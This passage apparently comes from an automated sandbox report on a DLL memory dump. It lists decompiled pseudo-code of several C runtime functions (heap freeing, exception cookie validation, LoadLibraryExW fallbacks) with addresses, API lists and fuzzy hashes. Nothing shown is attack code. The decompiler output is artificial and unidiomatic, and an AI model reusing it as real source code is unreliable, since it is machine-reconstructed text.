                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9B7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9C2
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9E4
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9F7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA10
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA48
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA4F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA6C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA84
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                • Opcode ID: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction ID: f74a755e22aef0896a9b5fa408a0da64e454c7f0919e4df320d9c99cfb1a0f4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D315E31A247089FEF129B7ADA40B5673F9BF00710F18452EE49BDB2D0DE75EA508798
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9B4D, Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                			E736D9B4D(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x736e1c18;
				if(_t68 != 0x736e1c18) {
					E736DA293(_t68);
					_t36 = _a4;
				}
				E736DA293( *((intOrPtr*)(_t36 + 0x3c)));
				E736DA293( *((intOrPtr*)(_a4 + 0x30)));
				E736DA293( *((intOrPtr*)(_a4 + 0x34)));
				E736DA293( *((intOrPtr*)(_a4 + 0x38)));
				E736DA293( *((intOrPtr*)(_a4 + 0x28)));
				E736DA293( *((intOrPtr*)(_a4 + 0x2c)));
				E736DA293( *((intOrPtr*)(_a4 + 0x40)));
				E736DA293( *((intOrPtr*)(_a4 + 0x44)));
				E736DA293( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E736D9995(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E736D99F6(_t67, _t72, _t73, _t77);
			}














                                                                                                                                                                                                                                0x736d9b4d
                                                                                                                                                                                                                                0x736d9b4d
                                                                                                                                                                                                                                0x736d9b4d
                                                                                                                                                                                                                                0x736d9b52
                                                                                                                                                                                                                                0x736d9b58
                                                                                                                                                                                                                                0x736d9b5a
                                                                                                                                                                                                                                0x736d9b60
                                                                                                                                                                                                                                0x736d9b63
                                                                                                                                                                                                                                0x736d9b68
                                                                                                                                                                                                                                0x736d9b6b
                                                                                                                                                                                                                                0x736d9b6f
                                                                                                                                                                                                                                0x736d9b7a
                                                                                                                                                                                                                                0x736d9b85
                                                                                                                                                                                                                                0x736d9b90
                                                                                                                                                                                                                                0x736d9b9b
                                                                                                                                                                                                                                0x736d9ba6
                                                                                                                                                                                                                                0x736d9bb1
                                                                                                                                                                                                                                0x736d9bbc
                                                                                                                                                                                                                                0x736d9bca
                                                                                                                                                                                                                                0x736d9bd5
                                                                                                                                                                                                                                0x736d9bdd
                                                                                                                                                                                                                                0x736d9bde
                                                                                                                                                                                                                                0x736d9be1
                                                                                                                                                                                                                                0x736d9be7
                                                                                                                                                                                                                                0x736d9beb
                                                                                                                                                                                                                                0x736d9bef
                                                                                                                                                                                                                                0x736d9bf0
                                                                                                                                                                                                                                0x736d9bfa
                                                                                                                                                                                                                                0x736d9c00
                                                                                                                                                                                                                                0x736d9c01
                                                                                                                                                                                                                                0x736d9c04
                                                                                                                                                                                                                                0x736d9c0a
                                                                                                                                                                                                                                0x736d9c0e
                                                                                                                                                                                                                                0x736d9c12
                                                                                                                                                                                                                                0x736d9c1b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction ID: ddb1edd4f9ed18cc31756fd0c7bb6d8f5c25aa08bd4ac0d45db7d741bc4a5af1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A21DD76D54208AFDF02DF95C940EDE7BB9BF08600F0445A9F5099B260EB76DB54CB84
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D7B00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E736D7B00(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				void* __esi;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t110;

				_t87 = __edx;
				_push(__ebx);
				_t73 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t73 = E736E0D60(__ecx,  *_t73);
				_t74 = _a8;
				_t6 = _t74 + 0x10; // 0x11
				_t94 = _t6;
				_push(_t94);
				_v20 = _t94;
				_v12 =  *(_t74 + 8) ^  *0x736eb004;
				E736D7AC0(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x736eb004);
				E736D80A7(_a12);
				_t53 = _a4;
				_t103 = _t102 + 0x10;
				_t91 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t91 - 0xfffffffe;
					if(_t91 != 0xfffffffe) {
						_t87 = 0xfffffffe;
						E736D8090(_t74, 0xfffffffe, _t94, 0x736eb004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t60 = _t91 + (_t91 + 2) * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
							_t61 = _t78 + _t60 * 4;
							_t79 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t80 = _v5;
								goto L7;
							} else {
								_t87 = _t94;
								_t62 = E736D8030(_t79, _t94);
								_t80 = 1;
								_v5 = 1;
								_t110 = _t62;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									_push(_t94);
									E736D7AC0(_t74, _t87, _t91, _t94, _v12);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x736e115c;
											if(__eflags != 0) {
												_t69 = E736E0C00(__eflags, 0x736e115c);
												_t103 = _t103 + 4;
												__eflags = _t69;
												if(_t69 != 0) {
													_t98 =  *0x736e115c; // 0x736d7cd5
													 *0x736e1104(_a4, 1);
													 *_t98();
													_t94 = _v20;
													_t103 = _t103 + 8;
												}
												_t63 = _a4;
											}
										}
										_t88 = _t63;
										E736D8070(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
											_t88 = _t91;
											E736D8090(_t65, _t91, _t94, 0x736eb004);
											_t65 = _a8;
										}
										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
										_t66 = E736D7AC0(_t74, _t88, _t91, _t94, _v12);
										E736D8050();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t99, _t94);
										__eflags = _t66;
										if(_t66 != 0) {
											_push(_t94);
											do {
												_t96 =  *_t66;
												E736D9721(_t66);
												_t66 = _t96;
												__eflags = _t96;
											} while (_t96 != 0);
											return _t66;
										}
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t91 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}
































                                                                                                                                                                                                                                0x736d7b00
                                                                                                                                                                                                                                0x736d7b06
                                                                                                                                                                                                                                0x736d7b07
                                                                                                                                                                                                                                0x736d7b0b
                                                                                                                                                                                                                                0x736d7b0c
                                                                                                                                                                                                                                0x736d7b12
                                                                                                                                                                                                                                0x736d7b1e
                                                                                                                                                                                                                                0x736d7b20
                                                                                                                                                                                                                                0x736d7b26
                                                                                                                                                                                                                                0x736d7b26
                                                                                                                                                                                                                                0x736d7b2f
                                                                                                                                                                                                                                0x736d7b31
                                                                                                                                                                                                                                0x736d7b34
                                                                                                                                                                                                                                0x736d7b37
                                                                                                                                                                                                                                0x736d7b3f
                                                                                                                                                                                                                                0x736d7b44
                                                                                                                                                                                                                                0x736d7b47
                                                                                                                                                                                                                                0x736d7b4a
                                                                                                                                                                                                                                0x736d7b51
                                                                                                                                                                                                                                0x736d7bad
                                                                                                                                                                                                                                0x736d7bb0
                                                                                                                                                                                                                                0x736d7bb8
                                                                                                                                                                                                                                0x736d7bbf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7bbf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b53
                                                                                                                                                                                                                                0x736d7b53
                                                                                                                                                                                                                                0x736d7b59
                                                                                                                                                                                                                                0x736d7b5f
                                                                                                                                                                                                                                0x736d7b65
                                                                                                                                                                                                                                0x736d7bd0
                                                                                                                                                                                                                                0x736d7bd9
                                                                                                                                                                                                                                0x736d7b67
                                                                                                                                                                                                                                0x736d7b67
                                                                                                                                                                                                                                0x736d7b67
                                                                                                                                                                                                                                0x736d7b6d
                                                                                                                                                                                                                                0x736d7b70
                                                                                                                                                                                                                                0x736d7b73
                                                                                                                                                                                                                                0x736d7b76
                                                                                                                                                                                                                                0x736d7b79
                                                                                                                                                                                                                                0x736d7b7e
                                                                                                                                                                                                                                0x736d7b94
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b80
                                                                                                                                                                                                                                0x736d7b80
                                                                                                                                                                                                                                0x736d7b82
                                                                                                                                                                                                                                0x736d7b87
                                                                                                                                                                                                                                0x736d7b89
                                                                                                                                                                                                                                0x736d7b8c
                                                                                                                                                                                                                                0x736d7b8e
                                                                                                                                                                                                                                0x736d7ba4
                                                                                                                                                                                                                                0x736d7bc4
                                                                                                                                                                                                                                0x736d7bc4
                                                                                                                                                                                                                                0x736d7bc8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7bda
                                                                                                                                                                                                                                0x736d7bdd
                                                                                                                                                                                                                                0x736d7be3
                                                                                                                                                                                                                                0x736d7be5
                                                                                                                                                                                                                                0x736d7bec
                                                                                                                                                                                                                                0x736d7bf3
                                                                                                                                                                                                                                0x736d7bf8
                                                                                                                                                                                                                                0x736d7bfb
                                                                                                                                                                                                                                0x736d7bfd
                                                                                                                                                                                                                                0x736d7bff
                                                                                                                                                                                                                                0x736d7c0c
                                                                                                                                                                                                                                0x736d7c12
                                                                                                                                                                                                                                0x736d7c14
                                                                                                                                                                                                                                0x736d7c17
                                                                                                                                                                                                                                0x736d7c17
                                                                                                                                                                                                                                0x736d7c1a
                                                                                                                                                                                                                                0x736d7c1a
                                                                                                                                                                                                                                0x736d7bec
                                                                                                                                                                                                                                0x736d7c20
                                                                                                                                                                                                                                0x736d7c22
                                                                                                                                                                                                                                0x736d7c27
                                                                                                                                                                                                                                0x736d7c2a
                                                                                                                                                                                                                                0x736d7c2d
                                                                                                                                                                                                                                0x736d7c35
                                                                                                                                                                                                                                0x736d7c39
                                                                                                                                                                                                                                0x736d7c3e
                                                                                                                                                                                                                                0x736d7c3e
                                                                                                                                                                                                                                0x736d7c45
                                                                                                                                                                                                                                0x736d7c48
                                                                                                                                                                                                                                0x736d7c58
                                                                                                                                                                                                                                0x736d7c5d
                                                                                                                                                                                                                                0x736d7c64
                                                                                                                                                                                                                                0x736d7c6a
                                                                                                                                                                                                                                0x736d7c6c
                                                                                                                                                                                                                                0x736d7c6e
                                                                                                                                                                                                                                0x736d7c6f
                                                                                                                                                                                                                                0x736d7c6f
                                                                                                                                                                                                                                0x736d7c72
                                                                                                                                                                                                                                0x736d7c77
                                                                                                                                                                                                                                0x736d7c7a
                                                                                                                                                                                                                                0x736d7c7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7c7e
                                                                                                                                                                                                                                0x736d7c80
                                                                                                                                                                                                                                0x736d7b92
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b92
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7b8e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b97
                                                                                                                                                                                                                                0x736d7b97
                                                                                                                                                                                                                                0x736d7b99
                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x736d7b65
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7B37
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 736D7B3F
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7BC8
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 736D7BF3
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7C48
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                • Opcode ID: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction ID: 06bcfdb3823eca6632ae82424dedac963ae3f8a898a7b5a53310191a76ef24ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1741A234A10218AFCF00DF69C984B9EBFB5FF45324F148595E81A9B3D1D731AA05CB96
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DB9A8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DB9A8(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x736efa08 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x736e1f08 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E736D9913(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E736D9913(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                                                                                                                                                                                                                0x736db9b1
                                                                                                                                                                                                                                0x736dba5b
                                                                                                                                                                                                                                0x736db9b9
                                                                                                                                                                                                                                0x736db9bb
                                                                                                                                                                                                                                0x736db9c2
                                                                                                                                                                                                                                0x736db9c4
                                                                                                                                                                                                                                0x736db9ca
                                                                                                                                                                                                                                0x736db9d7
                                                                                                                                                                                                                                0x736db9ec
                                                                                                                                                                                                                                0x736db9f0
                                                                                                                                                                                                                                0x736dba42
                                                                                                                                                                                                                                0x736dba42
                                                                                                                                                                                                                                0x736dba47
                                                                                                                                                                                                                                0x736dba4b
                                                                                                                                                                                                                                0x736dba4e
                                                                                                                                                                                                                                0x736dba4e
                                                                                                                                                                                                                                0x736dba54
                                                                                                                                                                                                                                0x736dba56
                                                                                                                                                                                                                                0x736dba6d
                                                                                                                                                                                                                                0x736dba66
                                                                                                                                                                                                                                0x736dba6c
                                                                                                                                                                                                                                0x736dba6c
                                                                                                                                                                                                                                0x736dba58
                                                                                                                                                                                                                                0x736dba58
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba58
                                                                                                                                                                                                                                0x736db9f2
                                                                                                                                                                                                                                0x736db9fb
                                                                                                                                                                                                                                0x736dba32
                                                                                                                                                                                                                                0x736dba32
                                                                                                                                                                                                                                0x736dba34
                                                                                                                                                                                                                                0x736dba36
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba3e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba3e
                                                                                                                                                                                                                                0x736dba05
                                                                                                                                                                                                                                0x736dba0a
                                                                                                                                                                                                                                0x736dba0f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba19
                                                                                                                                                                                                                                0x736dba1e
                                                                                                                                                                                                                                0x736dba23
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba28
                                                                                                                                                                                                                                0x736dba2e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba2e
                                                                                                                                                                                                                                0x736db9cf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736db9d5
                                                                                                                                                                                                                                0x736dba64
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 0-537541572
                                                                                                                                                                                                                                • Opcode ID: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction ID: bd3f09eb500b2476a93856ba6a92cdf78bda29b44807552fa0e939510c4026fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7210B72A51214FBDF129665CD44B5A3BADEB01760F1C0251ED1BAB2C9EBB0DD04C6E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DEA18, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DEA18(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E736DE9E0(_t45, 7);
					E736DE9E0(_t45 + 0x1c, 7);
					E736DE9E0(_t45 + 0x38, 0xc);
					E736DE9E0(_t45 + 0x68, 0xc);
					E736DE9E0(_t45 + 0x98, 2);
					E736DA293( *((intOrPtr*)(_t45 + 0xa0)));
					E736DA293( *((intOrPtr*)(_t45 + 0xa4)));
					E736DA293( *((intOrPtr*)(_t45 + 0xa8)));
					E736DE9E0(_t45 + 0xb4, 7);
					E736DE9E0(_t45 + 0xd0, 7);
					E736DE9E0(_t45 + 0xec, 0xc);
					E736DE9E0(_t45 + 0x11c, 0xc);
					E736DE9E0(_t45 + 0x14c, 2);
					E736DA293( *((intOrPtr*)(_t45 + 0x154)));
					E736DA293( *((intOrPtr*)(_t45 + 0x158)));
					E736DA293( *((intOrPtr*)(_t45 + 0x15c)));
					return E736DA293( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                                                                                                                                                                                                0x736dea1e
                                                                                                                                                                                                                                0x736dea23
                                                                                                                                                                                                                                0x736dea2c
                                                                                                                                                                                                                                0x736dea37
                                                                                                                                                                                                                                0x736dea42
                                                                                                                                                                                                                                0x736dea4d
                                                                                                                                                                                                                                0x736dea5b
                                                                                                                                                                                                                                0x736dea66
                                                                                                                                                                                                                                0x736dea71
                                                                                                                                                                                                                                0x736dea7c
                                                                                                                                                                                                                                0x736dea8a
                                                                                                                                                                                                                                0x736dea98
                                                                                                                                                                                                                                0x736deaa9
                                                                                                                                                                                                                                0x736deab7
                                                                                                                                                                                                                                0x736deac5
                                                                                                                                                                                                                                0x736dead0
                                                                                                                                                                                                                                0x736deadb
                                                                                                                                                                                                                                0x736deae6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736deaf6
                                                                                                                                                                                                                                0x736deafb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DE9E0: _free.LIBCMT ref: 736DEA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA66
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA71
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA7C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAD0
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEADB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAE6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAF1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
                                                                                                                                                                                                                                • Instruction ID: 189ce76c6b9c226a19bbe03b6b7b582dbdd0a5891350e311c65d0ea30a470b2a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38114F75962B04ABED65A7B1CC06FCB779C6F00B40F440C29B3DEAA1D0DA69F6144658
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

